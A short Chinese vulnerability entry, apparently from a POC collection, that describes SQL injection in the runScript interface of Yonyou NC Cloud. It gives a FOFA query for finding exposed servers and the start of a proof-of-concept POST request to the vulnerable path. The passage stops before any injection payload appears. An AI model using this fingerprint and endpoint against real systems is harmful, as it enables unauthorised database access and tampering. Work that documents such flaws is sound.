1.漏洞介绍
用友NC Cloud系统中的runScript接口被发现存在SQL注入(SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:body=“UClient.dmg”||app=“用友-U8-Cloud”
5.POC
POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) Apple